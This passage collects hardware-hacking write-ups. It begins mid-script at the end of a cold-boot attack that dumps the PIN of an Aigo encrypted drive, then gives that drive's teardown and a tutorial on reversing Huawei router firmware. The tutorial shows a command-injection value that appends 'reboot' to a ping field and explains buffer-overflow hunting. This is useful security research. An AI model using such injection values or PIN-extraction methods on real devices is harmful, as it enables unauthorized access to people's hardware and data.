        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Aigo Chinese encrypted HDD − Part 1: taking it apart

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

Introduction

Analyzing and breaking external encrypted HDDs has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:

  • Zalman VE-400
  • Zalman ZM-SHE500
  • Zalman ZM-VE500

Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: an LCD for information display and a keyboard to enter the PIN.

DISCLAIMER: This research was done on my personal time and is not related to my employer.

Patriot HDD front view with keyboard Patriot HDD package
Enclosure
Packaging

The user must input a password to access data, which is supposedly encrypted.

Note that the options are very limited:

  • the PIN can be changed by pressing F1 before unlocking
  • the PIN must be between 6 and 9 digits
  • there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.

In practice, F2, F3 and F4 are useless.

Hardware design

Of course one of the first things we do is tear down everything to identify the various components.

Removing the case is actually boring, with lots of very small screws and plastic to break.

In the end, we get this (note that I soldered the 5-pin header):

disk

Main PCB

The main PCB is pretty simple:

main PCB

Important parts, from top to bottom:

  • connector to the LCD PCB (CN1)
  • beeper (SP1)
  • Pm25LD010 (datasheet) SPI flash (U2)
  • Jmicron JMS539 (datasheet) USB-SATA controller (U1)
  • USB 3 connector (J1)

The SPI flash stores the JMS539 firmware and some settings.

LCD PCB

The LCD PCB is not really interesting:

LCD view

LCD PCB

It has:

  • an unknown LCD character display (with Chinese fonts probably), with serial control
  • a ribbon connector to the keyboard PCB

Keyboard PCB

Things get more interesting when we start to look at the keyboard PCB:

Keyboard PCB, back

Here, on the back we can see the ribbon connector and a Cypress CY8C21434 PSoC 1 microcontroller (I’ll mostly refer to it as “µC” or “PSoC”):

CY8C21434

The CY8C21434 is using the M8C instruction set, which is documented in the Assembly Language User Guide.

The product page states it supports CapSense, Cypress’ technology for capacitive keyboards, the technology in use here.

You can see the header I soldered, which is the standard ISSP programming header.

Following wires

It is always useful to get an idea of what’s connected to what. Here the PCB has rather big connectors and using a multimeter in continuity testing mode is enough to identify the connections:

hand drawn schematic

Some help to read this poorly drawn figure:

  • the PSoC is represented as in the datasheet
  • the next connector on the right is the ISSP header, which thankfully matches what we can find online
  • the right most connector is the clip for the ribbon, still on the keyboard PCB
  • the black square contains a drawing of the CN1 connector from the main PCB, where the cable goes to the LCD PCB. P11, P13 and P4 are linked to the PSoC pins 11, 13 and 4 through the LCD PCB.

Attack steps

Now that we know what the different parts are, the basic steps would be the same as for the drives analyzed in previous research :

  • make sure basic encryption functionality is there
  • find how the encryption keys are generated / stored
  • find out where the PIN is verified

However, in practice I was not really focused on breaking the security but more on having fun. So, I did the following steps instead:

  • dump the SPI flash content
  • try to dump PSoC flash memory (see part 2)
  • start writing the blog post
  • realize that the communications between the Cypress PSoC and the JMS539 actually contain keyboard presses
  • verify that nothing is stored in the SPI when the password is changed
  • be too lazy to reverse the 8051 firmware of the JMS539
  • TBD: finish analyzing the overall security of the drive (in part 3 ?)

Dumping the SPI flash

Dumping the flash is rather easy:

  • connect probes to the CLK, MOSI, MISO and (optionally) EN pins of the flash
  • sniff the communications using a logic analyzer (I used a Saleae Logic Pro 16)
  • decode the SPI protocol and export the results in CSV
  • use decode_spi.rb to parse the results and get a dump

Note that this works very well with the JMS539 as it loads its whole firmware from flash at boot time.
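
decode_spi.rb is the real tool (its output is shown just below); as a rough sketch of what such a decoder does, assuming the exported capture has already been reduced to one list of (MOSI, MISO) byte pairs per chip-select transaction:

def decode_transactions(transactions):
    # rebuild the flash image from standard SPI NOR READ (opcode 0x03) transactions
    flash = {}
    for pairs in transactions:
        mosi = [m for m, _ in pairs]
        miso = [s for _, s in pairs]
        if mosi and mosi[0] == 0x03:
            addr = (mosi[1] << 16) | (mosi[2] << 8) | mosi[3]
            for i, byte in enumerate(miso[4:]):      # data is clocked out after the 3 address bytes
                flash[addr + i] = byte
    return flash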

$ decode_spi.rb boot_spi1.csv dump
0.039776 : WRITE DISABLE
0.039777 : JEDEC READ ID
0.039784 : ID 0x7f 0x9d 0x21
---------------------
0.039788 : READ @ 0x0
0x12,0x42,0x00,0xd3,0x22,0x00,
[...]
$ ls --size --block-size=1 dump
49152 dump
$ sha1sum dump
3d9db0dde7b4aadd2b7705a46b5d04e1a1f3b125  dump

Unfortunately it does not seem obviously useful as:

  • the content did not change after changing the PIN
  • the flash is actually never accessed after boot

So it probably only holds the firmware for the JMicron controller, which embeds an 8051 microcontroller.

Sniffing communications

One way to find which chip is responsible for what is to check communications for interesting timing/content.

As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:

  • P4, generic I/O in the datasheet
  • P11, I²C SCL in the datasheet
  • P13, I²C SDA in the datasheet

probes

We then launch the Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard, which gives us the following view:

Saleae logic analyzer screenshot

You can see 3 different types of communications:

  • on the P4 channel, some short bursts
  • on P11 and P13, almost continuous exchanges

Zooming on the first P4 burst (blue rectangle in previous picture), we get this :

P4 zoom

You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.

However, we have one extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !

Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:

end of beep zoom

Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.

2-wire protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:

i2c decoding of '1' keypress

The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.

The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.

Anyway, see part 2 to read how I dumped the PSoC internal flash.

Practical Reverse Engineering Part 5 — Digging Through the Firmware


  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In part 4 we extracted the entire firmware from the router and decompressed it. As I explained then, you can often get most of the firmware directly from the manufacturer’s website: Firmware upgrade binaries often contain partial or entire filesystems, or even entire firmwares.

In this post we’re gonna dig through the firmware to find potentially interesting code, common vulnerabilities, etc.

I’m gonna explain some basic theory on the Linux architecture, disassembling binaries, and other related concepts. Feel free to skip some of the parts marked as [Theory]; the real hunt starts at ‘Looking for the Default WiFi Password Generation Algorithm’. At the end of the day, we’re just: obtaining source code in case we can use it, using grep and common sense to find potentially interesting binaries, and disassembling them to find out how they work.

One step at a time.

Gathering and Analysing Open Source Components

GPL Licenses — What They Are and What to Expect [Theory]

Linux, U-Boot and other tools used in this router are licensed under the General Public License. This license mandates that the source code for any binaries built with GPL’d projects must be made available to anyone who wants it.

Having access to all that source code can be a massive advantage during the reversing process. The kernel and the bootloader are particularly interesting, and not just to find security issues.

When hunting for GPL’d sources you can usually expect one of these scenarios:

  1. The code is freely available on the manufacturer’s website, nicely ordered and completely open to be tinkered with. For instance: Apple products or the Amazon Echo
  2. The source code is available by request
    • They send you an email with the sources you requested
    • They ask you for “a reasonable amount” of money to ship you a CD with the sources
  3. They decide to (illegally) ignore your requests. If this happens to you, consider being nice over trying to get nasty.

In the case of this router, the source code was available on their website, even though it was a huge pain in the ass to find; it took me a long time of manual and automated searching but I ended up finding it in the mobile version of the site:

ls -lh gpl_source

But what if they’re hiding something!? How could we possibly tell whether the sources they gave us are the same they used to compile the production binaries?

Challenges of Binary Verification [Theory]

Theoretically, we could try to compile the source code ourselves and compare the resulting binary with the one we extracted from the device. In practice, that is far more complicated than it sounds.

The exact contents of the binary are strongly tied to the toolchain and overall environment they were compiled in. We could try to replicate the environment of the original developers, finding the exact same versions of everything they used, so we can obtain the same results. Unfortunately, most compilers are not built with output replicability in mind; even if we managed to find the exact same version of everything, details like timestamps, processor-specific optimizations or file paths would stop us from getting a byte-for-byte identical match.

If you’d like to read more about it, I can recommend this paper. The authors go through the challenges they had to overcome in order to verify that the official binary releases of the application ‘TrueCrypt’ were not backdoored.

Introduction to the Architecture of Linux [Theory]

In multiple parts of the series, we’ve discussed the different components found in the firmware: bootloader, kernel, filesystem and some protected memory to store configuration data. In order to know where to look for what, it’s important to understand the overall architecture of the system. Let’s quickly review this device’s:

Linux Architecture

The bootloader is the first piece of code to be executed on boot. Its job is to prepare the kernel for execution, jump into it and stop running. From that point on, the kernel controls the hardware and uses it to run user space logic. A few more details on each of the components:

  1. Hardware: The CPU, Flash, RAM and other components are all physically connected
  2. Linux Kernel: It knows how to control the hardware. The developers take the Open Source Linux kernel, write drivers for their specific device and compile everything into an executable Kernel. It manages memory, reads and writes hardware registers, etc. In more complex systems, “kernel modules” provide the possibility of keeping device drivers as separate entities in the file system, and dynamically load them when required; most embedded systems don’t need that level of versatility, so developers save precious resources by compiling everything into the kernel
  3. libc (“The C Library”): It serves as a general purpose wrapper for the System Call API, including extremely common functions like printf, malloc or system. Developers are free to call the system call API directly, but in most cases, it’s MUCH more convenient to use libc. Instead of the extremely common glibc (GNU C library) we usually find in more powerful systems, this device uses a version optimised for embedded devices: uClibc.
  4. User Applications: Executable binaries in /bin/ and shared objects in /lib/ (libraries that contain functions used by multiple binaries) comprise most of the high-level logic. Shared objects are used to save space by storing commonly used functions in a single location

Bootloader Source Code

As I’ve mentioned multiple times over this series, this router’s bootloader is U-Boot. U-Boot is GPL licensed, but Huawei failed to include the source code in their website’s release.

Having the source code for the bootloader can be very useful for some projects, where it can help you figure out how to run a custom firmware on the device or modify something; some bootloaders are much more feature-rich than others. In this case, I’m not interested in anything U-Boot has to offer, so I didn’t bother following up on the source code.

Kernel Source Code

Let’s just check out the source code and look for anything that might help. Remember the factory reset button? The button is part of the hardware layer, which means the GPIO pin that detects the button press must be controlled by the drivers. These are the logs we saw coming out of the UART port in a previous post:

UART system restore logs

With some simple grep commands we can see how the different components of the system (kernel, binaries and shared objects) can work together and produce the serial output we saw:

System reset button propagates to user space

Having the kernel can help us find poorly implemented security-related algorithms and other weaknesses that are sometimes considered ‘accepted risks’ by manufacturers. Most importantly, we can use the drivers to compile and run our own OS on the device.

User Space Source Code

As we can see in the GPL release, some components of the user space are also open source, such as busybox and iptables. Given the right (wrong) versions, public vulnerability databases could be enough to find exploits for any of these.

That being said, if you’re looking for 0-days, backdoors or sensitive data, your best bet is not the open source projects. Device-specific and closed source code developed by the manufacturer or one of their providers has not been so heavily tested and may very well be riddled with bugs. Most of this code is stored as binaries in the user space; we’ve got the entire filesystem, so we’re good.

Without the source code for user space binaries, we need to find a way to read the machine code inside them. That’s where disassembly comes in.

Binary Disassembly [Theory]

The code inside every executable binary is just a compilation of instructions encoded as Machine Code so they can be processed by the CPU. Our processor’s datasheet will explain the direct equivalence between assembly instructions and their machine code representations. A disassembler has been given that equivalence so it can go through the binary, find data and machine code and translate it into assembly. Assembly is not pretty, but at least it’s human-readable.

Due to the very low-level nature of the kernel, and how heavily it interacts with the hardware, it is incredibly difficult to make any sense of its binary. User space binaries, on the other hand, are abstracted away from the hardware and follow unix standards for calling conventions, binary format, etc. They’re an ideal target for disassembly.

There are lots of disassemblers for popular architectures like MIPS; some better than others both in terms of functionality and usability. I’d say these 3 are the most popular and powerful disassemblers in the market right now:

  • IDA Pro: By far the most popular disassembler/debugger in the market. It is extremely powerful, multi-platform, and there are loads of users, tutorials, plugins, etc. around it. Unfortunately, it’s also VERY expensive; a single person license of the Pro version (required to disassemble MIPS binaries) costs over $1000
  • Radare2: Completely Open Source, uses an impressively advanced command line interface, and there’s a great community of hackers around it. On the other hand, the complex command line interface -necessary for the sheer amount of features- makes for a rather steep learning curve
  • Binary Ninja: Not open source, but reasonably priced at $100 for a personal license, it’s middle ground between IDA and radare. It’s still a very new tool; it was just released this year, but it’s improving and gaining popularity day by day. It already works very well for some architectures, but unfortunately it’s still missing MIPS support (coming soon) and some other features I needed for these binaries. I look forward to giving it another try when it’s more mature

In order to display the assembly code in a more readable way, all these disassemblers use a “Graph View”. It provides an intuitive way to follow the different possible execution flows in the binary:

IDA Small Function Graph View

Such a clear representation of branches, and their conditionals, loops, etc. is extremely useful. Without it, we’d have to manually jump from one branch to another in the raw assembly code. Not so fun.

If you read the code in that function you can see the disassembler does a great job displaying references to functions and hardcoded strings. That might be enough to help us find something juicy, but in most cases you’ll need to understand the assembly code to a certain extent.

Gathering Intel on the CPU and Its Assembly Code [Theory]

Let’s take a look at the format of our binaries:

$ file bin/busybox
bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size

Because ELF headers are designed to be platform-agnostic, we can easily find out some info about our binaries. As you can see, we know the architecture (32-bit MIPS), endianness (LSB), and whether it uses shared libraries.
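
If you want to double-check that without relying on file, the relevant fields sit at fixed offsets in the ELF header. A quick sketch; the offsets and values come straight from the ELF spec (EI_CLASS 1 = 32-bit, EI_DATA 1 = little-endian, e_machine 8 = MIPS):

import struct

with open("bin/busybox", "rb") as f:
    hdr = f.read(20)

assert hdr[:4] == b"\x7fELF"
ei_class, ei_data = struct.unpack_from("BB", hdr, 4)
(e_machine,) = struct.unpack_from("<H", hdr, 18)    # little-endian, as EI_DATA just told us
print("32-bit" if ei_class == 1 else "64-bit",
      "LSB" if ei_data == 1 else "MSB",
      "MIPS" if e_machine == 8 else hex(e_machine))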

We can verify that information thanks to Ralink’s product brief, which specifies the processor core it uses: MIPS24KEc

Product Brief Highlighted Processor Core

With the exact version of the CPU core, we can easily find its datasheet as released by the company that designed it: Imagination Technologies.

Once we know the basics we can just drop the binary into the disassembler. It will help validate some of our findings, and provide us with the assembly code. In order to understand that code we’re gonna need to know the architecture’s instruction sets and register names:

  • MIPS Instruction Set
  • MIPS Pseudo-Instructions: Very simple combinations of basic instructions, used for developer/reverser convenience
  • MIPS Alternate Register Names: In MIPS, there’s no real difference between registers; the CPU doesn’t care about what they’re called. Alternate register names exist to make the code more readable for the developer/reverser: $a0 to $a3 for function arguments, $t0 to $t9 for temporary registers, etc.

Beyond instructions and registers, some architectures may have some quirks. One example of this would be the presence of delay slots in MIPS: Instructions that appear immediately after branch instructions (e.g. beqz, jalr) but are actually executed before the jump. That sort of non-linearity would be unthinkable in other architectures.

Some interesting links if you’re trying to learn MIPS: Intro to MIPS Reversing using Radare2, MIPS Assembler and Runtime Simulator, Toolchains to cross-compile for MIPS targets.

Example of User Space Binary Disassembly

Following up on the reset key example we were using for the Kernel, we’ve got the code that generated some of the UART log messages, but not all of them. Since we couldn’t find the ‘button has been pressed’ string in the kernel’s source code, we can deduce it must have come from user space. Let’s find out which binary printed it:

~/Tech/Reversing/Huawei-HG533_TalkTalk/router_filesystem
$ grep -i -r "restore default success" .
Binary file ./bin/cli matches
Binary file ./bin/equipcmd matches
Binary file ./lib/libcfmapi.so matches

3 files contain the next string found in the logs: 2 executables in /bin/ and 1 shared object in /lib/. Let’s take a look at /bin/equipcmd with IDA:

restore success string in /bin/equipcmd - IDA GUI

If we look closely, we can almost read the C code that was compiled into these instructions. We can see a “clear configuration file”, which would match the ERASE commands we saw in the SPI traffic capture to the flash IC. Then, depending on the result, one of two strings is printed: restore default success or restore default fail. On success, it then prints something else, flushes some buffers and reboots; this also matches the behaviour we observed when we pressed the reset button.

That function is a perfect example of delay slots: the addiu instructions that set both strings as arguments —$a0— for the 2 puts are in the delay slots of the branch if equals zero and jump and link register instructions. They will actually be executed before branching/jumping.

As you can see, IDA has the name of all the functions in the binary. That won’t necessarily be the case in other binaries, and now’s a good time to discuss why.

Function Names in a Binary — Intro to Symbol Tables [Theory]

The ELF format specifies the usage of symbol tables: chunks of data inside a binary that provide useful debugging information. Part of that information are human-readable names for every function in the binary. This is extremely convenient for a developer debugging their binary, but in most cases it should be removed before releasing the production binary. The developers were nice enough to leave most of them in there 🙂

In order to remove them, the developers can use tools like strip, which know what must be kept and what can be spared. These tools serve a double purpose: They save memory by removing data that won’t be necessary at runtime, and they make the reversing process much more complicated for potential attackers. Function names give context to the code we’re looking at, which is massively helpful.

In some cases -mostly when disassembling shared objects- you may see some function names or none at all. The ones you WILL see are the Dynamic Symbols in the .dynsym table: We discussed earlier the massive amount of memory that can be saved by using shared objects to keep the pieces of code you need to re-use all over the system (e.g. printf()). In order to locate pieces of data inside the shared object, the caller uses their human-readable name. That means the names for functions and variables that need to be publicly accessible must be left in the binary. The rest of them can be removed, which is why ELF uses 2 symbol tables: .dynsym for publicly accessible symbols and .symtab for the internal ones.
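
A quick way to see the difference on one of our binaries is the pyelftools library (a sketch; the path is the equipcmd binary we grepped earlier):

from elftools.elf.elffile import ELFFile    # pip install pyelftools

with open("bin/equipcmd", "rb") as f:
    elf = ELFFile(f)
    for name in (".dynsym", ".symtab"):
        section = elf.get_section_by_name(name)
        count = section.num_symbols() if section else 0
        print("%-8s %5d symbols" % (name, count))   # 0 symbols -> table stripped or absent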

For more details on symbol tables and other intricacies of the ELF format, check out: The ELF Format — How programs look from the inside, Inside ELF Symbol Tables, and the ELF spec (PDF).

Looking for the Default WiFi Password Generation Algorithm

What do We Know?

Remember the wifi password generation algorithm we discussed in part 3? (The Pot of Gold at the End of the Firmware) I explained then why I didn’t expect this router to have one, but let’s take a look anyway.

If you recall, these are the default WiFi credentials in my router:

Router Sticker - Annotated

So what do we know?

  1. Each device is pre-configured with a different set of WiFi credentials
  2. The credentials could be hardcoded at the factory or generated on the device. Either way, we know from previous posts that both SSID and password are stored in the reserved area of Flash memory, and they’re right next to each other
    • If they were hardcoded at the factory, the router only needs to read them from a known memory location
    • If they are generated in the device and then stored to flash, there must be an algorithm in the router that -given the same inputs- always generates the same outputs. If the inputs are public (e.g. the MAC address) and we can find, reverse and replicate the algorithm, we could calculate default WiFi passwords for any other router that uses the same algorithm

Let’s see what we can do with that…

Finding Hardcoded Strings

Let’s assume there IS such an algorithm in the router. Between username and password, there’s only one string that remains constant across devices: TALKTALK-. This string is prepended to the last 6 characters of the MAC address. If the generation algorithm is in the router, surely this string must be hardcoded in there. Let’s look it up:

$ grep -r 'TALKTALK-' .
Binary file ./bin/cms matches
Binary file ./bin/nmbd matches
Binary file ./bin/smbd matches

2 of those 3 binaries (nmbd and smbd) are part of samba, the program used to expose the USB flash drive as a network storage device. They’re probably used to identify the router over the network. Let’s take a look at the other one: /bin/cms.

Reversing the Functions that Use Them

IDA TALKTALK-XXXXXX String Being Built

That looks exactly the way we’d expect the SSID generation algorithm to look. The code is located inside a rather large function called ATP_WLAN_Init, and somewhere in there it performs the following actions (replicated in the short Python sketch after the list):

  1. Find out the MAC address of the device we’re running on:
    • mac = BSP_NET_GetBaseMacAddress()
  2. Create the SSID string:
    • snprintf(SSID, "TALKTALK-%02x%02x%02x", mac[3], mac[4], mac[5])
  3. Save the string somewhere:
    • ATP_DBSetPara(SavedRegister3, 0xE8801E09, SSID)
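
Replicated in Python, steps 1 and 2 boil down to something like this (a sketch; the MAC address below is just an illustrative value, not one from a real device, and the hex case follows the snprintf format seen in the disassembly):

def default_ssid(mac):
    # mac: the 6 bytes of the device's MAC address; the SSID uses the last 3
    return "TALKTALK-%02x%02x%02x" % (mac[3], mac[4], mac[5])

print(default_ssid([0x00, 0x02, 0xF3, 0xA1, 0xB2, 0xC3]))   # -> TALKTALK-a1b2c3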

Unfortunately, right after this branch the function simply does an ATP_DBSave and moves on to start running commands and whatnot. e.g.:

ATP_WLAN_Init moves on before you

Further inspection of this function and other references to ATP_DBSave did not reveal anything interesting.

Giving Up

After some time using this process to find potentially relevant pieces of code, reverse them, and analyse them, I didn’t find anything that looked like the password generation algorithm. That would confirm the suspicions I’ve had since we found the default credentials in the protected flash area: The manufacturer used proper security techniques and flashed the credentials at the factory, which is why there is no algorithm. Since the designers manufacture their own hardware, the decision makes perfect sense for this device. They can do whatever they want with their manufacturing lines, so they decided to do it right.

I might take another look at it in the future, or try to find it in some other router (I’d like to document the process of reversing it), but you should know this method DOES work for a lot of products. There’s a long history of freely available default WiFi password generators.

Since we already know how to find relevant code in the filesystem binaries, let’s see what else we can do with that knowledge.

Looking for Command Injection Vulnerabilities

One of the most common, easy to find and dangerous vulnerabilities is command injection. The idea is simple; we find an input string that is gonna be used as an argument for a shell command. We try to append our own commands and get them to execute, bypassing any filters that the developers may have implemented. In embedded devices, such vulnerabilities often result in full root control of the device.

These vulnerabilities are particularly common in embedded devices due to their memory constraints. Say you’re developing the web interface used by the users to configure the device; you want to add the possibility to ping a user-defined server from the router, because it’s very valuable information to debug network problems. You need to give the user the option to define the ping target, and you need to serve them the results:

Router WEB Interface Ping in action

Once you receive the data of which server to target, you have two options: You find a library with the ICMP protocol implemented and call it directly from the web backend, or you could use a single, standard function call and use the router’s already existing ping shell command. The latter is easier to implement, saves memory, etc. and it’s the obvious choice. Taking user input (target server address) and using it as part of a shell command is where the danger comes in. Let’s see how this router’s web application, /bin/web, handles it:

/bin/web's ping function

A call to libc’s system() (not to be confused with a system call/syscall) is the easiest way to execute a shell command from an application. Sometimes developers wrap system() in custom functions in order to systematically filter all inputs, but there’s always something the wrapper can’t do or some developer who doesn’t get the memo.

Looking for references to system in a binary is an excellent way to find vectors for command injections. Just investigate the ones that look like may be using unfiltered user input. These are all the references to system() in the /bin/web binary:

xrefs to system in /bin/web

Even the names of the functions can give you clues on whether or not a reference to system() will receive user input. We can also see some references to PIN and PUK codes, SIMs, etc. Seems like this application is also used in some mobile product…

I spent some time trying to find ways around the filtering provided by atp_gethostbyname (anything that isn’t a domain name causes an error), but I couldn’t find anything in this field or any others. Further analysis may prove me wrong. The idea would be to inject something to the effect of this:

Attempt reboot injection on ping field

Which would result in this final string being executed as a shell command: ping google.com -c 1; reboot; ping 192.168.1.1 > /dev/null. If the router reboots, we found a way in.
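
To make the mechanics concrete, here is a toy sketch showing how an unfiltered field value turns into exactly that shell string. The command template is a made-up example, not the router’s actual code:

def build_ping_command(target):
    return "ping %s > /dev/null" % target    # hypothetical, unfiltered template

payload = "google.com -c 1; reboot; ping 192.168.1.1"
print(build_ping_command(payload))
# -> ping google.com -c 1; reboot; ping 192.168.1.1 > /dev/null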

As I said, I couldn’t find anything. Ideally we’d like to verify that for all input fields, whether they’re in the web interface or some other network interface. Another example of a network interface potentially vulnerable to remote command injections is the “LAN-Side DSL CPE Configuration” protocol, or TR-064. Even though this protocol was designed to be used over the internal network only, it’s been used to configure routers over the internet in the past. Command injection vulnerabilities in some implementations of this protocol have been used to remotely extract data like WiFi credentials from routers with just a few packets.

This router has a binary conveniently named /bin/tr064; if we take a look, we find this right in the main() function:

/bin/tr064 using /etc/serverkey.pem

That’s the private RSA key we found in Part 2 being used for SSL authentication. Now we might be able to supplant a router in the system and look for vulnerabilities in their servers, or we might use it to find other attack vectors. Most importantly, it closes the mystery of the private key we found while scouting the firmware.

Looking for More Complex Vulnerabilities [Theory]

Even if we couldn’t find any command injection vulnerabilities, there are always other vectors to gain control of the router. The most common ones are good old buffer overflows. Any input string into the router, whether it is for a shell command or any other purpose, is handled, modified and passed around the code. An error by the developer calculating expected buffer lengths, not validating them, etc. in those string operations can result in an exploitable buffer overflow, which an attacker can use to gain control of the system.

The idea behind a buffer overflow is rather simple: We manage to pass a string into the system that contains executable code. We overwrite some address in the program so the execution flow jumps into the code we just injected. Now we can do anything that binary could do -in embedded systems like this one, where everything runs as root, it means immediate root pwnage.

Introducing an unexpectedly long input

Developing an exploit for this sort of vulnerability is not as simple as appending commands to find your way around a filter. There are multiple possible scenarios, and different techniques to handle them. Exploits using more involved techniques like ROP can become necessary in some cases. That being said, most household embedded systems nowadays are decades behind personal computers in terms of anti-exploitation techniques. Methods like Address Space Layout Randomization (ASLR), which are designed to make exploit development much more complicated, are usually disabled or not implemented at all.

If you’d like to find a potential vulnerability so you can learn exploit development on your own, you can use the same techniques we’ve been using so far. Find potentially interesting inputs, locate the code that manages them using function names, hardcoded strings, etc. and try to trigger a malfunction sending an unexpected input. If we find an improperly handled string, we might have an exploitable bug.

Once we’ve located the piece of disassembled code we’re going to attack, we’re mostly interested in string manipulation functions like strcpy, strcat, sprintf, etc. Their more secure counterparts strncpy, strncat, etc. are also potentially vulnerable to some techniques, but usually much more complicated to work with.

Pic of strcpy handling an input

Even though I’m not sure that function -extracted from /bin/tr064— is passed any user inputs, it’s still a good example of the sort of code you should be looking for. Once you find potentially insecure string operations that may handle user input, you need to figure out whether there’s an exploitable bug.

Try to cause a crash by sending unexpectedly long inputs and work from there. Why did it crash? How many characters can I send without causing a crash? Which payload can I fit in there? Where does it land in memory? etc. etc. I may write about this process in more detail at some point, but there’s plenty of literature available online if you’re interested.

Don’t spend all your efforts on the most obvious inputs only -which are also more likely to be properly filtered/handled-; using tools like the burp web proxy (or even the browser itself), we can modify fields like cookies to check for buffer overflows.

Web vulnerabilities like CSRF are also extremely common in embedded devices with web interfaces. Exploiting them to write to files or bypass authentication can lead to absolute control of the router, specially when combined with command injections. An authentication bypass for a router with the web interface available from the Internet could very well expose the network to being remotely man in the middle’d. They’re definitely an important attack vector, even though I’m not gonna go into how to find them.

Decompiling Binaries [Theory]

When you decompile a binary, instead of simply translating Machine Code to Assembly Code, the decompiler uses algorithms to identify functions, loops, branches, etc. and replicate them in a higher level language like C or Python.

That sounds like a brilliant idea for anybody who has been banging their head against some assembly code for a few hours, but an additional layer of abstraction means more potential errors, which can result in massive wastes of time.

In my (admittedly short) personal experience, the output just doesn’t look reliable enough. It might be fine when using expensive decompilers (IDA itself supports a couple of architectures), but I haven’t found one I can trust with MIPS binaries. That being said, if you’d like to give one a try, the RetDec online decompiler supports multiple architectures- including MIPS.

Binary Decompiled to C by RetDec

Even as a ‘high level’ language, the code is not exactly pretty to look at.

Next Steps

Whether we want to learn something about an algorithm we’re reversing, to debug an exploit we’re developing or to find any other sort of vulnerability, being able to execute (and, if possible, debug) the binary on an environment we fully control would be a massive advantage. In some/most cases -like this router-, being able to debug on the original hardware is not possible. In the next post, we’ll work on CPU emulation to debug the binaries in our own computers.

Thanks for reading! I’m sorry this post took so long to come out. Between work, hardwear.io and seeing family/friends, this post was written about 1 paragraph at a time from 4 different countries. Things should slow down for a while, so hopefully I’ll be able to publish Part 6 soon. I’ve also got some other reversing projects coming down the pipeline, starting with hacking the Amazon Echo and a router with JTAG. I’ll try to get to those soon, work permitting… Happy Hacking 🙂


Tips and Tricks

Mistaken xrefs and how to remove them

Sometimes an address is loaded into a register for 16bit/32bit adjustments. The contents of that address have no effect on the rest of the code; it’s just a routine adjustment. If the address that is assigned to the register happens to be pointing to some valid data, IDA will rename the address in the assembly and display the contents in a comment.

It is up to you to figure out whether an x-ref makes sense or not. If it doesn’t, select the variable and press o in IDA to ignore the contents and give you only the address. This makes the code much less confusing.

Setting function prototypes so IDA comments the args around calls for us

Set the cursor on a function and press y. Set the prototype for the function: e.g. int memcpy(void *restrict dst, const void *restrict src, int n);. Note: IDA only understands built-in types, so we can’t use types like size_t.

Once again we can use the extern declarations found in the GPL source code. When available, find the declaration for a specific function, and use the same types and names for the arguments in IDA.

Taking Advantage of the GPL Source Code

